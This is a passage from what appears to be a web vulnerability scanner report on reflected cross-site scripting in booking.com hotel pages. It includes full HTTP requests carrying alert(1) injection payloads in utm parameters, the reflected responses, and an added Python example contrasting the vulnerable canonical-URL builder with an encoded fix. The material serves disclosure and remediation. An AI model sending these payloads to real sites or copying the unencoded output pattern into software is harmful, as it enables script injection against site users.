XslAiNjuAigUaNSFRZLqX74bxfY4lB634h2GnM%2BLb0cLXb6o42NeNY83q3XwSHVHvh1Ow8TTdHkisQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:12:57 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232637
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPCd2b58"><script>alert(1)</script>a34ab4a00ee;utm_source=tripad;utm_term=hotel-59554" />
...[SNIP]...
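Findings 4.184 to 4.188 above (and 4.189 below, which hits the same JavaScript-string sink) are one bug seen through two outputs: the page rebuilds a canonical URL from the query string and writes it both into a double-quoted href attribute and into a single-quoted JavaScript string, with no encoding at either point, and with arbitrary parameter names carried along. The Python below is an added example, not code from booking.com or from the scanner report. It reconstructs that behaviour from the request and response lines shown (the two QUERY_* strings are copied from the report's request lines; the INTERNAL and ALLOWED sets, the sort-by-name rule and every function name are assumptions inferred from the responses, not known internals) and puts the fixed builder beside it, so the exact payloads from the report can be run through both.

```python
"""
Context-aware encoding for the canonical-URL sinks in findings 4.184-4.189.

Added example (not booking.com or scanner code). Rebuilds the observed sinks
from the report's own request lines and shows the fix next to them.
"""
import html
import json
from urllib.parse import parse_qsl, quote

BASE = "http://www.booking.com/hotel/us/c-boston-massachusettes.en.html"
DELIM = ";"  # matches booking.env.b_canonical_url_delimiter in the responses

# Assumption: names that never show up in the canonical URL in the report.
INTERNAL = {"aid", "label", "do_availability_check", "checkin_monthday",
            "checkin_year_month", "checkout_monthday", "checkout_year_month", "lang"}
# Assumption for the fix: the only names the canonical URL should ever carry.
ALLOWED = {"utm_source", "utm_medium", "utm_content", "utm_term"}

# Constructed samples: the query strings from the request lines of 4.185 and 4.187.
QUERY_4185 = ("aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC"
              "&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on"
              "&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16"
              "&checkout_year_month=2011-10&lang=en&4c610'%3balert(1)//55af9cf3306=1")
QUERY_4187 = ("aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC"
              '&utm_content=text-cr6d7f9"><script>alert(1)</script>995cb4fd7af'
              "&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14"
              "&checkin_year_month=2011-10&checkout_monthday=16"
              "&checkout_year_month=2011-10&lang=en")


def canonical_vulnerable(pairs):
    """Observed behaviour: every non-internal name and value, sorted by name,
    concatenated raw. Unknown names (4.184, 4.185) pass straight through."""
    kept = sorted((n, v) for n, v in pairs if n not in INTERNAL)
    return BASE + "?" + DELIM.join(f"{n}={v}" for n, v in kept)


def render_vulnerable(pairs):
    """The two sinks exactly as the report shows them: attribute, then JS string."""
    url = canonical_vulnerable(pairs)
    link = f'<link rel="canonical" href="{url}" />'
    script = f"booking.env.b_canonical_url = '{url}';"
    return link, script


def canonical_safe(pairs):
    """Allow-list the names, then percent-encode names and values so the URL
    itself can never contain quotes, angle brackets or the ; delimiter."""
    kept = sorted((n, v) for n, v in pairs if n in ALLOWED)
    query = DELIM.join(f"{quote(n, safe='')}={quote(v, safe='')}" for n, v in kept)
    return BASE + ("?" + query if query else "")


def js_string_literal(s):
    """A JSON string literal is a valid JS string literal; escaping < > & on top
    keeps it from closing the <script> element or opening a tag. json.dumps
    with ensure_ascii (the default) also escapes U+2028/U+2029."""
    lit = json.dumps(s)
    return lit.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_safe(pairs):
    """Same two sinks, each encoded for its own context on top of the clean URL."""
    url = canonical_safe(pairs)
    link = f'<link rel="canonical" href="{html.escape(url, quote=True)}" />'
    script = f"booking.env.b_canonical_url = {js_string_literal(url)};"
    return link, script


def reflects(rendered, marker):
    """Triage check: does the scanner's marker survive unencoded in the output?"""
    return marker in rendered


def demo(query_string):
    """Parse a raw query string (as in the report's request lines) and render both ways."""
    pairs = parse_qsl(query_string, keep_blank_values=True)
    return {"vulnerable": render_vulnerable(pairs), "safe": render_safe(pairs)}


if __name__ == "__main__":
    for kind, (link, script) in demo(QUERY_4185).items():
        print(kind, script, "marker reflected:", reflects(script, "';alert(1)//"), sep="\n  ")
```

Running the file prints the 4.185 JavaScript sink twice: the vulnerable rendering is byte-for-byte the line from the report, the safe one no longer contains the injected name at all. The order of the fixes matters: allow-listing names is what closes the "arbitrarily supplied parameter" findings, percent-encoding is what makes the URL safe to carry anywhere, and each sink still gets its own encoder (attribute escaping, a JSON literal with `<`, `>` and `&` escaped) because a canonical URL is not the only value that will ever be written there.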

4.189. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd3ac'-alert(1)-'e975783ca10 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPCfd3ac'-alert(1)-'e975783ca10&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:05 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGdtgREHFMYP9KL%2BXWDp4eXWLKqDT4JHK4Ck5t9jXCZSfgs8iZ0zc4fI%2FNmoyKuXU%2F74EgzaV72KBAwDEbn9K7SqcpEXhY0l1KJih5E2TOjss6weHL6zvPdgpsLLsf1oG%2BH7TzGNYU4bNvX1GP8SiLhTA%2FvdnRlJXj2q0%2FBKEyhlglZdav2FlTPKnBneyCmsuM36VOCkVAn5L2CkKQ1vOz1okhGPaUihOuFhSIzlj9Arejb62RiNeghkIEoeTA%2BgIdU4HfXEzFoQqkNfkE15VQpyDqYIaEjbaDqet4733cA3Z6Hq1c44TurbwalX%2BDTE4tp8U8NsDBuoTekaJj9Ek05Gb%2FrOAFOBOsT1niC1HH8F3Wcu4MiPLGvPW%2BXojhtsHuqxK6tJJEpM65v5%2FuBa3ahdAnP790KQdF%2FgY3Il%2B1bdrzgf4JiZf2hnnxm661d40W8AuxjF9%2BKprTgXAp%2B75A7JEY01wZYHFAldpGQ6d1dFpLCcx2tpjO2AazPLocxB%2BeW0PjQnekdA%2FPnRj%2FHNQs9d4w1NGpq7OCx9QAgYsm3eBU4WSkGUPKYJmcKeaj3eHs%2FVm%2BE8xb0um%2BlFRWOv8oyfA3bHI9vCkDY5cdU%2BTG1sjb802fhPCmSN8N55QS0fpgfp13E%2F%2FIYjh64GmXW%2FdcpPauCfyGFKnGT2cTV9exDpFLUDUcsR2sTp6MNzZz%2BDO13KFrgLHKvZbkDIXd8m4Nj51Yvwp1s3R15BXNpMqXuHhV60gbt1EKpTsGv%2B3tw%2BDwIMv6oz7U%2BvhS%2BM9FWIkhbMpKUu6VhApOl7hpKM5cO3%2BGkU2B%2FtRQaGLwTkrkgnxYkXAXjau8InPVw8U4XbGejs0fE7kJDcJ%2F%2F526LouDz9Gat1FmOBJL2iruSHxlAjOeh6h5LzemoJMMnSRaX5bEtQgZ%2B1QMvCz0Nzf9INX6A8Lj9bpUcFOQUN%2FJajA8NXYHxUXOmmICCPPXw7FxLrattzOT%2B3us0oDHTk14DShhJqHWmpbKWzETgCQWsTgAnzXswBrLGecDvc5%2FKF2GxA3E7CT1whPVtdpnCPsBTVaAATFZaQYnEV9w8m4bwXDQJZa0fwzi6l46ODvQFtBGMlsgxN%2BLu1wljdU0IxQWhX5i8H3K5B17j6GX7yUJc4ar7qNa0BIhdbGKmewuGcXaz0zb%2FNLNGhDCn8OgpZlmsv7rzYUYdEf71dccc%2BwkHB4AK2e0xwwrSOwFhSR75c95g9tMvJM59Y%2FLOh1Fdc2oBpw6afdT%2FlKNJu%2BVbYPpl6Ru38TJSEaXabozn9BXOMVN%2BtDjlKL8APukxa%2FVhc8cOOJkbN3BcjoccYZhMpMqIegFODrUDC1OfMU%2B6poj58pGs8hkag%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:06 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232451
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
r transl_undo = 'undo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPCfd3ac'-alert(1)-'e975783ca10;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Re
...[SNIP]...

4.190. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88360"><script>alert(1)</script>20235bacbb was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad88360"><script>alert(1)</script>20235bacbb&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:44 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIugJMp3Gj9PNlSuxcoQNwZ6LXSFeIzvYV8mPOyMjCm0pfd2bYFkXQeWt4y%2BN04%2BkdaH1SwlKJCzRrAwpDMbjINgmTAIE5GSS4ITKglwKIxqjD7RmuByDzu4X4Gwny%2FQydVmyxCeHTxM2rYHVXkHjy%2F3Uv9sSe3TBAPCTYb5iOv3WoMjUXcE%2BINjA%2BZO%2FtIKKjZywA8ETqYXJsvqoHzS%2B6aBroK%2BgwpmcxCeWNw%2B%2F67BSTcGIh5T13ieKnIYdjgz9glBqxUuQZiULjP%2BohZrAFsebIRaTl63AikGDnnWKgW0MTw8LjjNXYA4ekF80rSTCeLA3Gvcq3tIhg9vzYqWlkXJedr9bEgbZ55icgFaZ8HuxrL6FofPtwhEkNcKmH6l35oIPyuhIAwmIiGGEK8LbVZPTw0EbIxzckL9oJxI2czV8imiC8I4LF2RUz6eunrs7dtOKlaNslDuvAXILfF5tNxYA330HtBUeg29G%2F2xgHYKfQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:12:44 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232628
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad88360"><script>alert(1)</script>20235bacbb;utm_term=hotel-59554" />
...[SNIP]...

4.191. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a8c0'-alert(1)-'25e8e054b4e was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad5a8c0'-alert(1)-'25e8e054b4e&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:53 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIuSFpakoAx7btwWpARpik40cFp4jGfSEtabG2VeVgNWWuFAj3bxJzcK25QSwEYw5kYv1AqYhBRMkxQqma0O5v%2Bql9s%2Bsr02%2BcR6JRA41hLBBZE7g9kHfIn8iiRNx8E4p8Cu40MNSH3cUNqfvKrT3M5nYeB%2FTBRdQ1SiBc3RiqsLLAfSi3PTrWrLhVlRc%2FFgaYDskWwaq9cAeyYQN4F7A%2B0ntfTP%2BDarcl6bCk7idorUw4No4o5NeUi9oFyELqGMAppbe3t6AElUMuVtFX4MVvMonk%2F80Dsp9avp3BMZDCBEbHU880XisObt1U0KZ9ptNRnm%2BPg59c7Mk14n6Eqlwe2eoR0sIMMJahT9wznD%2F51tVO%2F01y%2FbiDBBL3RYUEJEbrvcuHHIl8OXj7soBEijaeUIKRFHgJ%2FJsK%2Fs5Jc3ZfFaQ6NgUJ1TPiwhpDdV%2FfPNFkVOIi%2FObgCR050E28JNbSXKE9CixQQ3U66nZjDO1u2Rmw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:12:53 GMT; HTTPOnly
